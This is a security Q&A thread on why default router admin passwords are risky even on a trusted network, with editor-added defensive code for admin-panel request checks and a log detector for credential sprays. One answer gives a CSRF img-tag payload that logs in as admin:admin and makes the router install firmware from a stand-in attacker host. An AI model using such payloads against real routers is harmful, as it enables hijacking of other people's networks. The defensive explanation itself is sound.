
There are a lot of articles addressing the dangers of default router admin passwords. Certain security applications will also detect default router admin passwords as a vulnerability. However, these articles all focus on what could possibly happen if your router was compromised.

But suppose we have a router configured such that the admin panel is only open to the local network. Furthermore, suppose that the password to connect to the network (i.e. via wifi) is sufficiently secure (i.e. very high entropy), and only trusted users are allowed on the network.

Under these conditions, could the router still be compromised? Is there still a need to change the default router admin password? My thoughts are that if an attacker can't get into the network, they can't compromise the router regardless of the router's admin password. CSRF is a possibility, but that can be defended against with a CSRF token. Are there any other possibilities I haven't considered?

Zsw

  • _"if only trusted users are allowed on the network"_ <-- This tends to be a false assumption when talking about network security, IMO. – walen Oct 28 '16 at 08:30
  • Did you hear about the recent attack to Dyn, carried out exploiting internet-connected devices which were using the default username/password? – algiogia Oct 28 '16 at 08:50
  • What's the point? If it's lack of imagination then here, https://strongpasswordgenerator.com/ – mcfedr Oct 28 '16 at 08:56
  • So the router has no Ethernet port(s) either? We can assume it's physically secure too? – MonkeyZeus Oct 28 '16 at 12:30
  • @walen's point is only reinforced by the fact that you immediately mention Wifi -- and at least some of the links you refer to are talking about consumer-grade routers with consumer-grade wifi security – Chris H Oct 28 '16 at 14:47
  • It probably took you longer to write this question than it would have taken you to change the default password and write it down on a post-it. – Federico Poloni Oct 28 '16 at 17:43
  • @walen The reason you assume it's false is because doing so allows you to achieve defense in depth. – jpmc26 Oct 28 '16 at 17:57
  • @Federico Poloni while that is true, I would've lost out on the reasoning as to why I needed to change it. This also makes it easier to convince friends or family to change the password too. – Zsw Oct 28 '16 at 19:05
  • XSS/CSRF possible on the router page(s)? Able to login via `hxxp://admin:admin@192.168.0.1` or wherever it's hosted? Wireless access point can access the login panel? Anyone could plug a device into the network and get themselves a nice DHCP'd internal address? Good luck with your new internal malware staging ground, and thank you for making it easier to compromise your entire network. Don't mind if I just "update" the router firmware to do what I want. ;) – Mark Buffalo Oct 28 '16 at 19:05
  • Well, this question is like asking if you should keep your safe deposit box number a secret when your house has many CCTVs, alarms, and locks. Some would think that you don't even need a safe box in a house like that, but that's arguable – am05mhz Oct 29 '16 at 04:35
  • Is it okay to leave my safe unlocked as long as nobody has a key to my front door? – Darren H Oct 30 '16 at 18:35
  • Iranian networks in sites used for purposes such as uranium enrichment were also accessed only by "trusted" individuals. That turned out to be no real protection at all. – user2338816 Oct 31 '16 at 09:20
  • Whenever you write "only trusted users" you should think "only trusted software". No reason to let one infected computer spread it further. – jpa Nov 01 '16 at 09:17

13 Answers


As you correctly noticed CSRF attacks are a possibility. Prevention of CSRF attacks is possible with a CSRF token, but this is nothing you can do as the user of the router. So if you are a router vendor you should definitely implement CSRF protection but as a user you have to live with what the vendor offers you and many vendors don't have proper CSRF protection.

Beyond CSRF there are other attacks which can be used against the router. Similarly to CSRF, many of these use the browser as the trampoline, i.e. just require a visit to some web site which has exploits embedded (like embedded in advertisements) and don't need a compromise of the user's computer. Noticeable among these are cross site scripting (XSS) and DNS rebinding attacks. Here again the vendor could implement proper protection in theory, but in practice it is often not done.

And then even trusted users might have their system compromised through a variety of ways. In this case the attacker is inside the trusted network and knowledge of default passwords makes it a lot easier to hijack the router and make the attacker's control over the network more permanent and less obvious this way.

This means even if you think you have proper protection, you should change the password away from the default in the spirit of defense in depth. The more unknowns an attacker has to find out to infiltrate the network, the harder you make it for him, and the better you secure your network. And of course this also applies not only to the password but general router security, i.e. some routers have bugs or even backdoors where you don't even have to know the user's password for a takeover. And it's not only routers but you also have to watch out for other devices like printers, scanners, smart light bulbs, TV etc.

Steffen Ullrich

  • What's the difference between *"The more unknowns an attacker has to find out to infiltrate the network, the harder you make it for him, and the better you secure your network."* and "security by obscurity"? – Ismael Miguel Oct 28 '16 at 22:32
  • @IsmaelMiguel There is no harm in security by obscurity as long as it is not the only form of security; it is a valid technique to complement the difficulty of overcoming other security measures. And for that matter, if you are taking the term overly literally, all security would seem to be by obscurity. – Vality Oct 28 '16 at 22:51
  • @Vality I'm not taking anything. I just wanted to know the difference. And the difference is that "security by obscurity" is bad if it is the **only** way of security that is implemented. – Ismael Miguel Oct 28 '16 at 23:20
  • @IsmaelMiguel: I don't think that password controlled access is commonly called security by obscurity. I think this term more refers to relying on secrets which will eventually be figured out, i.e. a security design which is secret but broken anyway. Thus relying on a strong password for security is not bad, but hoping that the attacker will not figure out which router you use and therefore does not know which default password is in use would be insufficient. – Steffen Ullrich Oct 29 '16 at 01:33
  • @SteffenUllrich Hum? – Ismael Miguel Oct 29 '16 at 02:28
  • @IsmaelMiguel: I refer to you comparing *"the more unknowns ..."* with *"security by obscurity"*. I've tried to explain that not every *"unknown"* (like a password) is considered only *"obscurity"*, but some are. – Steffen Ullrich Oct 29 '16 at 05:44
  • "Security by obscurity" is the half-empty bottle of beer, "secret" the half-full one, or vice versa, depending on whether you think of half-full / half-empty as being the better one. Security by obscurity usually refers to things that cannot be easily replaced (e.g. a design or algorithm), while a secret is something that can change every now and then, such as a password or key. But in the end, by their literal meaning, they are pretty much the same, though obscurity may mean that "all the information is there, you just need to find a way to recognize it". – Arc Oct 30 '16 at 08:52

Is it dangerous to use default router admin passwords if only trusted users are allowed on the network?

[Image: Crying Buffalo]

Yes, it's dangerous. Here are a few more "technical" ways to do it (other than saying it's bad):

1. No CSRF Protection

You could be happily visiting a website, and there could be any number of issues with it:

  1. The website itself was haxored and has malicious content inserted in it, or;

  2. Any of the elements on the page have been MITM in the middle attacked (shut up, I'm trying to be funny) and have had elements intercepted with The Thing(tm), and;

  3. CSRF attack was inserted by style, img, link, or anything else:

    Rough example:

    <img src="http://admin:admin@192.168.0.1/updateFirmware.cgi?file=hxxp://hax.com/hax.bin&confirmUpgrade=true"/>

In many cases, the CSRF protection won't help if you can log in with admin:admin@routerip through a link like that. It will create a new session and token for you instead of using your current one.

[Image: New cigarette malware installed in your router's face]

Congratulations on your newest installation of Router Backdoor(tm) with full shell access.

2. CSRF protection exists, but not Proper XSS Protection

Escape context and insert hax.js, or just JS code which could perform the following functions:

  1. Steal CSRF token with JavaScript
  2. See <img src=""/> above.

Also, .svg images can bypass a lot of XSS protection.

3. Router configuration page is accessible via the wireless network?

Someone logs in to your wireless network, visits the router configuration page and makes necessary changes/upgrades the firmware/redirects DNS/whatever they want. Like the first one, but with a point-and-click interface instead.

4. Other ways

  • Disgruntled employees
  • If anyone finds their way on your network through another compromised machine, they can use that machine to compromise your router and then you're boned.

Keep in mind, XSS/CSRF attacks could exist, or even be added during upgrades, if the vendor is crap.

So don't do it. Please. My heart can't take it. :(

Mark Buffalo

  • The lonely *c* in successfully in the gif and *Congratulation!* without an s is bothering me so much. You did it. – Yates Oct 31 '16 at 09:22
  • What's the point of the images in this answer? What do they add? – user Oct 31 '16 at 12:52
  • Are you going to turn green if the author proceeds with his plan, disregarding your advice? – Seth Oct 31 '16 at 14:15
  • @MichaelKjörling They add a light touch of humor to the response. – DaveTheMinion Oct 31 '16 at 14:21
  • @MichaelKjörling It made me laugh, so I guess it adds humor. – Failsafe Oct 31 '16 at 17:51
  • @MichaelKjörling, the first image is from a time when Americans had commercials telling them not to litter trash all over the place. In one commercial, a Native American (I'm one of them, so this is fitting?) walked up to a bunch of folks throwing trash and spreading crap all over the place, and when he saw it, he turned around and cried. Likewise, default credentials outside of a honeypot environment make me turn around and cry at the invisible NSA cameras pointed at my computer. The cigarette thing... well, if you use default creds, don't be surprised if your router gets eCancer? ¯\_(ツ)_/¯ – Mark Buffalo Oct 31 '16 at 17:56
  • @MarkBuffalo from eCigarettes, I assume? – Nick Mertin Nov 01 '16 at 21:21
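Steffen Ullrich's answer says CSRF, XSS and DNS rebinding protection is something only the vendor can put into the admin panel, and Mark Buffalo's answer shows why a token alone is not enough when an `<img>` tag can log in with `admin:admin@router` and change settings via a plain GET. The following is an added example of the server-side checks such a panel would need, written by the editor and not taken from either answer or from any real router firmware. The origins (`http://192.168.0.1`, `http://router.local`), the endpoint names (`/updateFirmware.cgi`, `/setDns.cgi`, `/setAdminPassword.cgi`) and the request objects are assumptions; the demo requests are constructed to mirror the attacks described above.

```python
"""Added example (not from the answers above): checks a router admin panel can
apply to every request so that the CSRF <img> trick, a forged cross-site POST,
credentials smuggled in a URL, and DNS rebinding all fail. Origins, endpoint
names and the request model are assumptions."""
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

# Assumed: the only origins under which the admin UI is served.
ROUTER_ORIGINS = {"http://192.168.0.1", "http://router.local"}
# Assumed endpoint names; anything listed here changes router state.
MUTATING_PATHS = {"/updateFirmware.cgi", "/setDns.cgi", "/setAdminPassword.cgi"}


@dataclass
class Session:
    """Session created by the login form; carries a per-session CSRF token."""
    user: str
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    method: str
    path: str
    headers: dict                       # header names lower-cased
    form: dict = field(default_factory=dict)
    session: Optional[Session] = None   # resolved from a session cookie, if any


def check_admin_request(req: Request) -> tuple:
    """Return (allowed, reason). Reads are only gated on Host; writes get the
    full set of checks, in the order an attacker's request would hit them."""
    # 1. Host must name the router itself. In a DNS rebinding attack the
    #    browser sends Host: attacker-domain while connecting to the router.
    host = req.headers.get("host", "")
    if f"http://{host}" not in ROUTER_ORIGINS:
        return False, "host header does not name the router (DNS rebinding?)"
    if req.path not in MUTATING_PATHS:
        return True, "read-only request"
    # 2. No state change via GET: an <img src=...> can only issue GETs.
    if req.method != "POST":
        return False, "state change requires POST"
    # 3. Credentials embedded in a URL arrive as an Authorization header.
    #    Only a session established through the login form counts as a login.
    if req.session is None:
        if "authorization" in req.headers:
            return False, "URL/basic credentials are not a login; use the form"
        return False, "not authenticated"
    # 4. Browsers set Origin (or Referer) on cross-site POSTs; it must be ours.
    origin = req.headers.get("origin") or req.headers.get("referer", "")
    if not any(origin == o or origin.startswith(o + "/") for o in ROUTER_ORIGINS):
        return False, f"cross-site origin {origin!r}"
    # 5. Per-session CSRF token, compared in constant time.
    submitted = req.form.get("csrf_token", "")
    if not hmac.compare_digest(submitted, req.session.csrf_token):
        return False, "bad or missing csrf token"
    return True, "ok"


def demo() -> dict:
    """Constructed requests: the CSRF <img> from the answer (GET with
    admin:admin in the URL), a rebinding POST, a forged cross-site POST,
    a stale token, and a legitimate form submission."""
    sess = Session(user="admin")
    img_tag = Request("GET", "/updateFirmware.cgi",
                      {"host": "192.168.0.1", "authorization": "Basic YWRtaW46YWRtaW4="})
    rebinding = Request("POST", "/setDns.cgi",
                        {"host": "attacker.example", "origin": "http://attacker.example"},
                        {"csrf_token": sess.csrf_token}, sess)
    forged = Request("POST", "/setDns.cgi",
                     {"host": "192.168.0.1", "origin": "http://attacker.example"},
                     {"dns": "10.0.0.53"}, sess)
    stale = Request("POST", "/setDns.cgi",
                    {"host": "192.168.0.1", "origin": "http://192.168.0.1"},
                    {"csrf_token": "old-token"}, sess)
    legit = Request("POST", "/setDns.cgi",
                    {"host": "192.168.0.1", "origin": "http://192.168.0.1"},
                    {"csrf_token": sess.csrf_token}, sess)
    return {name: check_admin_request(r) for name, r in
            [("img_tag", img_tag), ("rebinding", rebinding),
             ("forged", forged), ("stale", stale), ("legit", legit)]}


if __name__ == "__main__":
    for name, (ok, why) in demo().items():
        print(f"{name:10s} {'ALLOW' if ok else 'DENY ':5s} {why}")
```

Each check stops a different attack on its own: the Host check defeats rebinding even for read-only pages, the POST-only rule stops the `<img>` trick before any credential is examined, and the Origin check rejects a forged form even when the attacker somehow knows the token. Order matters only for the reason string; a real panel would log the reason and the source address.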

Yes, routers have been compromised by malware executing inside the network, testing a list of default passwords. The malware enters the network through an infected phishing attachment, or a browser exploit.

If you have the ability to validate the router can't be reconfigured outside of the local network, you not only have the ability to change the default password, you have a duty to fix it.

John Deters

  • Generally it is advisable to consider the internal network as hostile and not secure. Assume that there is some sort of malware on the internal network. – MikeP Oct 28 '16 at 15:31
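The behaviour John Deters describes, malware inside the network trying a list of default passwords against the router, leaves a recognisable trace in the router's login log if the router keeps one. The following is an added example by the editor, not from the answer, of a small detector for that pattern: a burst of failed admin logins from one internal host, optionally followed by a success. The log line format and the sample lines are constructed for the example; real routers log differently and the regex would need adjusting.

```python
"""Added example (not from the answer): flag an internal host trying a list
of default credentials against the router admin interface. Log format and
sample lines are constructed; adjust LINE for a real router's syslog."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

LINE = re.compile(
    r"^(?P<ts>\S+) admin-ui: login (?P<result>ok|failed) "
    r"user=(?P<user>\S+) from=(?P<src>\S+)$"
)

# Constructed sample: one host sprays admin/root within seconds and gets in;
# another host fails once (a typo) and logs in 30 s later.
SAMPLE_LOG = """\
2016-10-28T08:30:01 admin-ui: login failed user=admin from=192.168.0.23
2016-10-28T08:30:02 admin-ui: login failed user=admin from=192.168.0.23
2016-10-28T08:30:02 admin-ui: login failed user=root from=192.168.0.23
2016-10-28T08:30:03 admin-ui: login failed user=admin from=192.168.0.23
2016-10-28T08:30:04 admin-ui: login ok user=admin from=192.168.0.23
2016-10-28T09:15:10 admin-ui: login failed user=admin from=192.168.0.7
2016-10-28T09:15:40 admin-ui: login ok user=admin from=192.168.0.7
"""


def parse(log: str) -> list:
    """Parse matching lines into dicts; lines in other formats are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]),
                           "result": m["result"], "user": m["user"], "src": m["src"]})
    return sorted(events, key=lambda e: e["ts"])


def find_credential_sprays(log: str, threshold: int = 3,
                           window: timedelta = timedelta(seconds=30)) -> list:
    """Alert on any source with >= threshold failed logins inside `window`.
    success_after=True means a login from that source succeeded after the
    burst, i.e. the router should be treated as compromised."""
    by_src = defaultdict(list)
    for e in parse(log):
        by_src[e["src"]].append(e)
    alerts = []
    for src, evs in by_src.items():
        fails = [e for e in evs if e["result"] == "failed"]
        for start in fails:                       # sliding window over failures
            burst = [f for f in fails if start["ts"] <= f["ts"] <= start["ts"] + window]
            if len(burst) >= threshold:
                last = burst[-1]["ts"]
                alerts.append({
                    "src": src,
                    "failures": len(burst),
                    "usernames": sorted({f["user"] for f in burst}),
                    "success_after": any(e["result"] == "ok" and e["ts"] >= last
                                         for e in evs),
                })
                break                             # one alert per source
    return alerts


if __name__ == "__main__":
    for a in find_credential_sprays(SAMPLE_LOG):
        print(a)
```

Three failures in thirty seconds is a deliberately low bar: nobody types the router admin password wrong that often by hand, but a script walking a default-credential list does it in under a second. The `usernames` field is there because a spray typically rotates through `admin`, `root` and vendor-specific names, which a single user would never do.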

I find it extraordinary that this question was asked, and I am not even a security professional. It is a bit like asking "Is it OK to leave the bank vault unlocked if only trusted cashiers are allowed in the basement?". One does not know where to start in responding. I half wonder if the question was an Ali G style windup, posted for sport.

A default password - for anything at all - is little better than a system not using a password. In one sense it is actually worse, because it fosters the illusion of password protection (which might be a ground assumption on which other parts of the system's security place reliance, in a system of checks and balances and compensating controls) whilst in reality the informed person with malicious intent is now in. It becomes a sort of back door for those out there in the know. Pen testers regularly do demonstrations at IT fairs of how easy it is to look up default passwords in vendors' data sheets and on the web.

Default password problems are going to get a whole lot worse when the Internet of Things, that ultimate example of a supply without a demand, gets going. I am still reeling from seeing a projected display map of all the hackable internet kettles (yes, really) in London that were revealing their owner's computer IP and learning of the camera-equipped dolls that were turned into remote spies on their users and reprogrammed to swear expletives.

Staycator

  • +1 A default password is *worse* than not using a password. Not using a password makes it clear that everybody can access the device. Having a default password provides a false sense of security. – AnoE Oct 28 '16 at 13:15
  • Sorry if you found it extraordinary that the question was asked. – Zsw Oct 28 '16 at 17:38
  • Everyone here seems to make the assumption that a default password is generally known. How do you know that the manufacturer has not set a device specific default password? – meriton Oct 29 '16 at 16:44
  • @meriton: There have been numerous cases of device-specific default passwords that could be derived from the serial number, or MAC address, of the device. – Guntram Blohm Oct 30 '16 at 08:51
  • @meriton That's precisely the problem: you don't know. Because you don't know, you *must* assume that the password is public information if you want to properly secure your network. – Darkhogg Oct 30 '16 at 11:00

YES!

Thou shalt not use default username or passwords

Here is the reason why:

  1. Routers are infamous for being vulnerable to backdoors (i.e., even if you did configure the administrative interfaces to be accessible only through the local network, it is not unlikely to have a sneaky backdoor port which is exposed to the internet).
  2. Router web consoles are infamous for being vulnerable to CSRF, XSS and a bunch of other vulnerabilities. Chaining the above two, an attacker can make an unsuspecting user log in with the default username/password and even send valid requests to alter configurations. Interestingly, all these actions might be done in the background, while the user is playing a web game ;)
  3. WiFi security doesn't entirely depend on password entropy. It depends on the algorithm used as well.
  4. Zero day vulnerabilities exist and any of the 'trusted' users can be a victim of those. If their accounts are compromised, you would be in trouble.
  5. Last but not least;

CSRF is a possibility, but that can be defended against with CSRF token.

Tadaa.. none of the routers have fixed it yet for their interfaces. In the 23rd century, probably they will.

hax

Even a trusted user can have their machine hacked. Using this as a starting point, an attacker can gain full access to your routers. In other words, you would have reduced protection in the event of an attack from the inside. This is a classic example of being blindsided -- a Trojan horse.

jdigital

This may come off as snarky, but if you are lazy enough to not change the default password because the device is in an isolated network, what's to say someone wasn't equally as lazy in setting up this secured network. Furthermore, your access through wifi defeats the idea that this network is sufficiently secure. The only way to physically isolate a network device such that the default password would be safe would be to have nothing plugged into it (including power), encase it in concrete, and then drop it in the Mariana Trench. Then you'd still have to worry about James Cameron getting access to it.

Shackledtodesk

If whatever device you are using for a wireless AP ends up being compromised...if this network has sensitive information on it, you're going to end up having a bad time.

Is it highly unlikely that someone is going to exploit a vulnerability on your wireless router? Yes.

Is it a possibility? Yes.

If you are even remotely serious about network security you should ALWAYS change the default password on your router!

Besides decent enterprise security devices (say those that perform routine network scans, IDS, custom hosts files - all that fun stuff) there is still nothing preventing malware from getting on your network and exploiting the fact that your passwords are set to something default.

At the end of the day, your end users are going to get your network infected.

It's not a maybe, it is just a matter of time.

Say 'Jan in accounting' is 86 years old and knows jack about infosec.

She is more dangerous than ALL other threats you may face on a day to day basis.

Change your password. Change the default username.

You can implement all kinds of protective measures and still be compromised due to a default username and password. Disgruntled employee, somebody's smart and still learning script kiddie (during bring your kid to work day), all kinds of things can happen.

Why take the risk in an enterprise?

And when you change this password, for the love of god don't make it something stupid. I've seen networks set up (open shares w/everyone permission...everything screaming what and where it is...that have outrageously sensitive info on them) and the password....to an outward facing router is something akin to '1234#businessname' .... I somewhat feel obligated to contact their clients and let them know that they hired an IT management company that doesn't take security seriously.

Then again I have better things to do.

Whenever they get hit with cryptolocker they'll end up facing the consequences.

Losing a $50k/yr client can really hurt a small company.


I am disturbed by the thinking behind "My thoughts are that if an attacker can't get into the network, they can't compromise the router...". This seems to betray a total lack of appreciation of the segregation principle in good security.

One controls a risk with relevant measures directly applicable to where it arises, rather than load all one's reliance onto the indirect effects of global or more remotely located controls elsewhere.

Ships are expected not to let water in (good perimeter security) but the diligent shipbuilder still fits bulkheads below deck, so that any water penetration that does occur in breach of all the fine design efforts elsewhere is still contained to a small area (damage limitation by compartmentalisation). The fatefully named Herald of Free Enterprise cut costs by not bothering to fit bulkheads. On 6 March 1987, through operator error it let in water via the open bow doors. It listed violently and took only 90 seconds to capsize while barely out of harbour. 193 people died in the near-freezing water.

Staycator

You might have heard of "Prevention is better than Cure".
Don't be so lazy that you don't even want to change the default password for your routers. This is basic 101 class stuff. Always change the default password. Doesn't matter how secure the conditions are today. They change with time. You never know what kind of attack will be invented in future. Keep yourself up for everything.

Ugnes

As a general rule, never rely on a single point of failure. Everyone here has valid points. If someone really wants on your network, it's really just a matter of time before they have access. Whether it's a brute force attack, a DDOS attack or just some social engineering that tricks one of your authenticated users into divulging their credentials, eventually, a single point of failure will fail. Secure everything important on your network just like it was exposed to the internet directly. Also keep in mind, if you store sensitive customer information, you are responsible and liable in court if it gets leaked.


In principle this does not even take time to deploy. If your router model comes set up with an apparently non-random password, the manufacturer is not even trying to look secure; they should be considered untrustworthy. Manufacturers trying to sell cheap routers are notoriously not worth giving the benefit of the doubt. Now you have an untrusted router. As you say, this would be a serious risk factor.

Routers designated as having only trusted users (even excluding external ports) are not common.

Home systems host smartphones with poor security (updates), as one example.

Business systems host users who should not generally change infrastructure settings.

Networks set up as an exercise clearly shouldn't use insecure settings just because you can get away with it; the exercise is defeated. (Exception: the exercise is specifically to demonstrate insecure defaults).

Networks for testing still deserve a certain amount of care. In some cases you would expect them to match your description. However in determining this, you would be making a point of omitting standard security. Again, in principle you have no reason to be sabotaging the system like this.

Diceware is a bit annoying, but it reduces the problem to generating decent random numbers. Google a website to generate you a page of random dice rolls, and pick the rolls randomly. Tape the password to the router, and there you go.

sourcejedi

I'm wondering if there is some implicit thinking behind the original Q that goes, "One risk: therefore one control to sort it". Whereas actually the relationship between risks and controls is many-many, not one-one.

You may have a car alarm. This control addresses the risk of theft of portable items from the car, and it also addresses the separate risk of the car being taken and driven away. (i): One control; more than one related risk.

You also have a lockable car door. This is a different control but it addresses the above two risks.

Each risk is addressed by more than one control (alarm and door lock).
So (ii): One risk (taking each in its turn); more than one related control.

You wouldn't cease to bother to lock your car door just because you have a car alarm. And against car theft you might have a Krooklok apparatus or steering wheel bar as well, or an ignition password or beeper, or remote GPS tracking (three, four or even five controls against one risk). Against later attempts to sell or clone the vehicle, you have the chassis number etched into the windscreen plus at least one secret place (making up to six controls against car theft or its direct consequences).

None of these controls is superfluous just because others are in place, though I think most of us would regard all six as overkill and not bother with the inconvenience of a capricious alarm or a bulky physical device that has to be unlocked if less burdensome good security is also in place.

In summary, the relationship between risks and the controls that treat them is not one-to-one, and this applies to networks and routers as much as anything else.

Staycator